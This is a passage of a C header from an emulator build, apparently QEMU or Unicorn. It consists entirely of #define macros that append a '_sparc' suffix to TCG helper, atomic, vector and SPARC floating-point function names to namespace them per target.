helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_sparc #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_sparc #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_sparc #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_sparc #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_sparc #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_sparc #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_sparc #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_sparc #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_sparc #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_sparc #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_sparc #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_sparc #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_sparc #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_sparc #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_sparc #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_sparc #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_sparc #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_sparc #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_sparc #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_sparc #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_sparc #define helper_atomic_add_fetchw_be_mmu 
helper_atomic_add_fetchw_be_mmu_sparc #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_sparc #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_sparc #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_sparc #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_sparc #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_sparc #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_sparc #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_sparc #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_sparc #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_sparc #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_sparc #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_sparc #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_sparc #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_sparc #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_sparc #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_sparc #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_sparc #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_sparc #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_sparc #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_sparc #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_sparc #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_sparc #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_sparc #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_sparc #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_sparc #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_sparc #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_sparc #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_sparc #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_sparc #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_sparc #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_sparc #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_sparc #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_sparc #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_sparc #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_sparc #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_sparc #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_sparc #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_sparc #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_sparc #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_sparc #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_sparc #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_sparc #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_sparc #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_sparc #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_sparc #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_sparc #define 
helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_sparc #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_sparc #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_sparc #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_sparc #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_sparc #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_sparc #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_sparc #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_sparc #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_sparc #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_sparc #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_sparc #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_sparc #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_sparc #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_sparc #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_sparc #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_sparc #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_sparc #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_sparc #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_sparc #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_sparc #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_sparc #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_sparc #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_sparc #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_sparc #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_sparc #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_sparc #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_sparc #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_sparc #define helper_atomic_xchgb helper_atomic_xchgb_sparc #define helper_atomic_fetch_addb helper_atomic_fetch_addb_sparc #define helper_atomic_fetch_andb helper_atomic_fetch_andb_sparc #define helper_atomic_fetch_orb helper_atomic_fetch_orb_sparc #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_sparc #define helper_atomic_add_fetchb helper_atomic_add_fetchb_sparc #define helper_atomic_and_fetchb helper_atomic_and_fetchb_sparc #define helper_atomic_or_fetchb helper_atomic_or_fetchb_sparc #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_sparc #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_sparc #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_sparc #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_sparc #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_sparc #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_sparc #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_sparc #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_sparc #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_sparc #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_sparc #define helper_atomic_xchgw_le helper_atomic_xchgw_le_sparc #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_sparc #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_sparc #define 
helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_sparc #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_sparc #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_sparc #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_sparc #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_sparc #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_sparc #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_sparc #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_sparc #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_sparc #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_sparc #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_sparc #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_sparc #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_sparc #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_sparc #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_sparc #define helper_atomic_xchgw_be helper_atomic_xchgw_be_sparc #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_sparc #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_sparc #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_sparc #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_sparc #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_sparc #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_sparc #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_sparc #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_sparc #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_sparc #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_sparc #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_sparc #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_sparc #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_sparc #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_sparc #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_sparc #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_sparc #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_sparc #define helper_atomic_xchgl_le helper_atomic_xchgl_le_sparc #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_sparc #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_sparc #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_sparc #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_sparc #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_sparc #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_sparc #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_sparc #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_sparc #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_sparc #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_sparc #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_sparc #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_sparc #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_sparc #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_sparc #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_sparc #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_sparc #define helper_atomic_cmpxchgl_be 
helper_atomic_cmpxchgl_be_sparc #define helper_atomic_xchgl_be helper_atomic_xchgl_be_sparc #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_sparc #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_sparc #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_sparc #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_sparc #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_sparc #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_sparc #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_sparc #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_sparc #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_sparc #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_sparc #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_sparc #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_sparc #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_sparc #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_sparc #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_sparc #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_sparc #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_sparc #define helper_atomic_xchgq_le helper_atomic_xchgq_le_sparc #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_sparc #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_sparc #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_sparc #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_sparc #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_sparc #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_sparc #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_sparc #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_sparc #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_sparc #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_sparc #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_sparc #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_sparc #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_sparc #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_sparc #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_sparc #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_sparc #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_sparc #define helper_atomic_xchgq_be helper_atomic_xchgq_be_sparc #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_sparc #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_sparc #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_sparc #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_sparc #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_sparc #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_sparc #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_sparc #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_sparc #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_sparc #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_sparc #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_sparc #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_sparc #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_sparc #define 
helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_sparc #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_sparc #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_sparc #define cpu_ldub_code cpu_ldub_code_sparc #define cpu_lduw_code cpu_lduw_code_sparc #define cpu_ldl_code cpu_ldl_code_sparc #define cpu_ldq_code cpu_ldq_code_sparc #define helper_div_i32 helper_div_i32_sparc #define helper_rem_i32 helper_rem_i32_sparc #define helper_divu_i32 helper_divu_i32_sparc #define helper_remu_i32 helper_remu_i32_sparc #define helper_shl_i64 helper_shl_i64_sparc #define helper_shr_i64 helper_shr_i64_sparc #define helper_sar_i64 helper_sar_i64_sparc #define helper_div_i64 helper_div_i64_sparc #define helper_rem_i64 helper_rem_i64_sparc #define helper_divu_i64 helper_divu_i64_sparc #define helper_remu_i64 helper_remu_i64_sparc #define helper_muluh_i64 helper_muluh_i64_sparc #define helper_mulsh_i64 helper_mulsh_i64_sparc #define helper_clz_i32 helper_clz_i32_sparc #define helper_ctz_i32 helper_ctz_i32_sparc #define helper_clz_i64 helper_clz_i64_sparc #define helper_ctz_i64 helper_ctz_i64_sparc #define helper_clrsb_i32 helper_clrsb_i32_sparc #define helper_clrsb_i64 helper_clrsb_i64_sparc #define helper_ctpop_i32 helper_ctpop_i32_sparc #define helper_ctpop_i64 helper_ctpop_i64_sparc #define helper_lookup_tb_ptr helper_lookup_tb_ptr_sparc #define helper_exit_atomic helper_exit_atomic_sparc #define helper_gvec_add8 helper_gvec_add8_sparc #define helper_gvec_add16 helper_gvec_add16_sparc #define helper_gvec_add32 helper_gvec_add32_sparc #define helper_gvec_add64 helper_gvec_add64_sparc #define helper_gvec_adds8 helper_gvec_adds8_sparc #define helper_gvec_adds16 helper_gvec_adds16_sparc #define helper_gvec_adds32 helper_gvec_adds32_sparc #define helper_gvec_adds64 helper_gvec_adds64_sparc #define helper_gvec_sub8 helper_gvec_sub8_sparc #define helper_gvec_sub16 helper_gvec_sub16_sparc #define helper_gvec_sub32 helper_gvec_sub32_sparc #define helper_gvec_sub64 helper_gvec_sub64_sparc #define helper_gvec_subs8 helper_gvec_subs8_sparc #define helper_gvec_subs16 helper_gvec_subs16_sparc #define helper_gvec_subs32 helper_gvec_subs32_sparc #define helper_gvec_subs64 helper_gvec_subs64_sparc #define helper_gvec_mul8 helper_gvec_mul8_sparc #define helper_gvec_mul16 helper_gvec_mul16_sparc #define helper_gvec_mul32 helper_gvec_mul32_sparc #define helper_gvec_mul64 helper_gvec_mul64_sparc #define helper_gvec_muls8 helper_gvec_muls8_sparc #define helper_gvec_muls16 helper_gvec_muls16_sparc #define helper_gvec_muls32 helper_gvec_muls32_sparc #define helper_gvec_muls64 helper_gvec_muls64_sparc #define helper_gvec_neg8 helper_gvec_neg8_sparc #define helper_gvec_neg16 helper_gvec_neg16_sparc #define helper_gvec_neg32 helper_gvec_neg32_sparc #define helper_gvec_neg64 helper_gvec_neg64_sparc #define helper_gvec_abs8 helper_gvec_abs8_sparc #define helper_gvec_abs16 helper_gvec_abs16_sparc #define helper_gvec_abs32 helper_gvec_abs32_sparc #define helper_gvec_abs64 helper_gvec_abs64_sparc #define helper_gvec_mov helper_gvec_mov_sparc #define helper_gvec_dup64 helper_gvec_dup64_sparc #define helper_gvec_dup32 helper_gvec_dup32_sparc #define helper_gvec_dup16 helper_gvec_dup16_sparc #define helper_gvec_dup8 helper_gvec_dup8_sparc #define helper_gvec_not helper_gvec_not_sparc #define helper_gvec_and helper_gvec_and_sparc #define helper_gvec_or helper_gvec_or_sparc #define helper_gvec_xor helper_gvec_xor_sparc #define helper_gvec_andc helper_gvec_andc_sparc #define helper_gvec_orc 
helper_gvec_orc_sparc #define helper_gvec_nand helper_gvec_nand_sparc #define helper_gvec_nor helper_gvec_nor_sparc #define helper_gvec_eqv helper_gvec_eqv_sparc #define helper_gvec_ands helper_gvec_ands_sparc #define helper_gvec_xors helper_gvec_xors_sparc #define helper_gvec_ors helper_gvec_ors_sparc #define helper_gvec_shl8i helper_gvec_shl8i_sparc #define helper_gvec_shl16i helper_gvec_shl16i_sparc #define helper_gvec_shl32i helper_gvec_shl32i_sparc #define helper_gvec_shl64i helper_gvec_shl64i_sparc #define helper_gvec_shr8i helper_gvec_shr8i_sparc #define helper_gvec_shr16i helper_gvec_shr16i_sparc #define helper_gvec_shr32i helper_gvec_shr32i_sparc #define helper_gvec_shr64i helper_gvec_shr64i_sparc #define helper_gvec_sar8i helper_gvec_sar8i_sparc #define helper_gvec_sar16i helper_gvec_sar16i_sparc #define helper_gvec_sar32i helper_gvec_sar32i_sparc #define helper_gvec_sar64i helper_gvec_sar64i_sparc #define helper_gvec_shl8v helper_gvec_shl8v_sparc #define helper_gvec_shl16v helper_gvec_shl16v_sparc #define helper_gvec_shl32v helper_gvec_shl32v_sparc #define helper_gvec_shl64v helper_gvec_shl64v_sparc #define helper_gvec_shr8v helper_gvec_shr8v_sparc #define helper_gvec_shr16v helper_gvec_shr16v_sparc #define helper_gvec_shr32v helper_gvec_shr32v_sparc #define helper_gvec_shr64v helper_gvec_shr64v_sparc #define helper_gvec_sar8v helper_gvec_sar8v_sparc #define helper_gvec_sar16v helper_gvec_sar16v_sparc #define helper_gvec_sar32v helper_gvec_sar32v_sparc #define helper_gvec_sar64v helper_gvec_sar64v_sparc #define helper_gvec_eq8 helper_gvec_eq8_sparc #define helper_gvec_ne8 helper_gvec_ne8_sparc #define helper_gvec_lt8 helper_gvec_lt8_sparc #define helper_gvec_le8 helper_gvec_le8_sparc #define helper_gvec_ltu8 helper_gvec_ltu8_sparc #define helper_gvec_leu8 helper_gvec_leu8_sparc #define helper_gvec_eq16 helper_gvec_eq16_sparc #define helper_gvec_ne16 helper_gvec_ne16_sparc #define helper_gvec_lt16 helper_gvec_lt16_sparc #define helper_gvec_le16 helper_gvec_le16_sparc #define helper_gvec_ltu16 helper_gvec_ltu16_sparc #define helper_gvec_leu16 helper_gvec_leu16_sparc #define helper_gvec_eq32 helper_gvec_eq32_sparc #define helper_gvec_ne32 helper_gvec_ne32_sparc #define helper_gvec_lt32 helper_gvec_lt32_sparc #define helper_gvec_le32 helper_gvec_le32_sparc #define helper_gvec_ltu32 helper_gvec_ltu32_sparc #define helper_gvec_leu32 helper_gvec_leu32_sparc #define helper_gvec_eq64 helper_gvec_eq64_sparc #define helper_gvec_ne64 helper_gvec_ne64_sparc #define helper_gvec_lt64 helper_gvec_lt64_sparc #define helper_gvec_le64 helper_gvec_le64_sparc #define helper_gvec_ltu64 helper_gvec_ltu64_sparc #define helper_gvec_leu64 helper_gvec_leu64_sparc #define helper_gvec_ssadd8 helper_gvec_ssadd8_sparc #define helper_gvec_ssadd16 helper_gvec_ssadd16_sparc #define helper_gvec_ssadd32 helper_gvec_ssadd32_sparc #define helper_gvec_ssadd64 helper_gvec_ssadd64_sparc #define helper_gvec_sssub8 helper_gvec_sssub8_sparc #define helper_gvec_sssub16 helper_gvec_sssub16_sparc #define helper_gvec_sssub32 helper_gvec_sssub32_sparc #define helper_gvec_sssub64 helper_gvec_sssub64_sparc #define helper_gvec_usadd8 helper_gvec_usadd8_sparc #define helper_gvec_usadd16 helper_gvec_usadd16_sparc #define helper_gvec_usadd32 helper_gvec_usadd32_sparc #define helper_gvec_usadd64 helper_gvec_usadd64_sparc #define helper_gvec_ussub8 helper_gvec_ussub8_sparc #define helper_gvec_ussub16 helper_gvec_ussub16_sparc #define helper_gvec_ussub32 helper_gvec_ussub32_sparc #define helper_gvec_ussub64 helper_gvec_ussub64_sparc 
#define helper_gvec_smin8 helper_gvec_smin8_sparc #define helper_gvec_smin16 helper_gvec_smin16_sparc #define helper_gvec_smin32 helper_gvec_smin32_sparc #define helper_gvec_smin64 helper_gvec_smin64_sparc #define helper_gvec_smax8 helper_gvec_smax8_sparc #define helper_gvec_smax16 helper_gvec_smax16_sparc #define helper_gvec_smax32 helper_gvec_smax32_sparc #define helper_gvec_smax64 helper_gvec_smax64_sparc #define helper_gvec_umin8 helper_gvec_umin8_sparc #define helper_gvec_umin16 helper_gvec_umin16_sparc #define helper_gvec_umin32 helper_gvec_umin32_sparc #define helper_gvec_umin64 helper_gvec_umin64_sparc #define helper_gvec_umax8 helper_gvec_umax8_sparc #define helper_gvec_umax16 helper_gvec_umax16_sparc #define helper_gvec_umax32 helper_gvec_umax32_sparc #define helper_gvec_umax64 helper_gvec_umax64_sparc #define helper_gvec_bitsel helper_gvec_bitsel_sparc #define cpu_restore_state cpu_restore_state_sparc #define page_collection_lock page_collection_lock_sparc #define page_collection_unlock page_collection_unlock_sparc #define free_code_gen_buffer free_code_gen_buffer_sparc #define tcg_exec_init tcg_exec_init_sparc #define tb_cleanup tb_cleanup_sparc #define tb_flush tb_flush_sparc #define tb_phys_invalidate tb_phys_invalidate_sparc #define tb_gen_code tb_gen_code_sparc #define tb_exec_lock tb_exec_lock_sparc #define tb_exec_unlock tb_exec_unlock_sparc #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_sparc #define tb_invalidate_phys_range tb_invalidate_phys_range_sparc #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_sparc #define tb_check_watchpoint tb_check_watchpoint_sparc #define cpu_io_recompile cpu_io_recompile_sparc #define tb_flush_jmp_cache tb_flush_jmp_cache_sparc #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_sparc #define translator_loop_temp_check translator_loop_temp_check_sparc #define translator_loop translator_loop_sparc #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_sparc #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_sparc #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_sparc #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_sparc #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_sparc #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_sparc #define unassigned_mem_ops unassigned_mem_ops_sparc #define floatx80_infinity floatx80_infinity_sparc #define dup_const_func dup_const_func_sparc #define gen_helper_raise_exception gen_helper_raise_exception_sparc #define gen_helper_raise_interrupt gen_helper_raise_interrupt_sparc #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_sparc #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_sparc #define gen_helper_cpsr_read gen_helper_cpsr_read_sparc #define gen_helper_cpsr_write gen_helper_cpsr_write_sparc #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_sparc #define helper_compute_psr helper_compute_psr_sparc #define helper_compute_C_icc helper_compute_C_icc_sparc #define cpu_sparc_set_id cpu_sparc_set_id_sparc #define cpu_sparc_init cpu_sparc_init_sparc #define helper_check_ieee_exceptions helper_check_ieee_exceptions_sparc #define helper_fadds helper_fadds_sparc #define helper_faddd helper_faddd_sparc #define helper_faddq helper_faddq_sparc #define helper_fsubs helper_fsubs_sparc #define helper_fsubd helper_fsubd_sparc #define helper_fsubq helper_fsubq_sparc #define helper_fmuls helper_fmuls_sparc #define helper_fmuld helper_fmuld_sparc #define helper_fmulq helper_fmulq_sparc #define 
helper_fdivs helper_fdivs_sparc #define helper_fdivd helper_fdivd_sparc #define helper_fdivq helper_fdivq_sparc #define helper_fsmuld helper_fsmuld_sparc #define helper_fsmulq helper_fsmulq_sparc #define helper_fdmulq helper_fdmulq_sparc #define helper_fnegs helper_fnegs_sparc #define helper_fnegd helper_fnegd_sparc #define helper_fnegq helper_fnegq_sparc #define helper_fitos helper_fitos_sparc #define helper_fitod helper_fitod_sparc #define helper_fitoq helper_fitoq_sparc #define helper_fxtos helper_fxtos_sparc #define helper_fxtod helper_fxtod_sparc #define helper_fxtoq helper_fxtoq_sparc #define helper_fdtos helper_fdtos_sparc #define helper_fstod helper_fstod_sparc #define helper_fqtos helper_fqtos_sparc #define helper_fstoq helper_fstoq_sparc #define helper_fqtod helper_fqtod_sparc #define helper_fdtoq helper_fdtoq_sparc #define helper_fstoi helper_fstoi_sparc #define helper_fdtoi helper_fdtoi_sparc #define helper_fqtoi helper_fqtoi_sparc #define helper_fstox helper_fstox_sparc #define helper_fdtox helper_fdtox_sparc #define helper_fqtox helper_fqtox_sparc #define helper_fabss helper_fabss_sparc #define helper_fabsd helper_fabsd_sparc #define 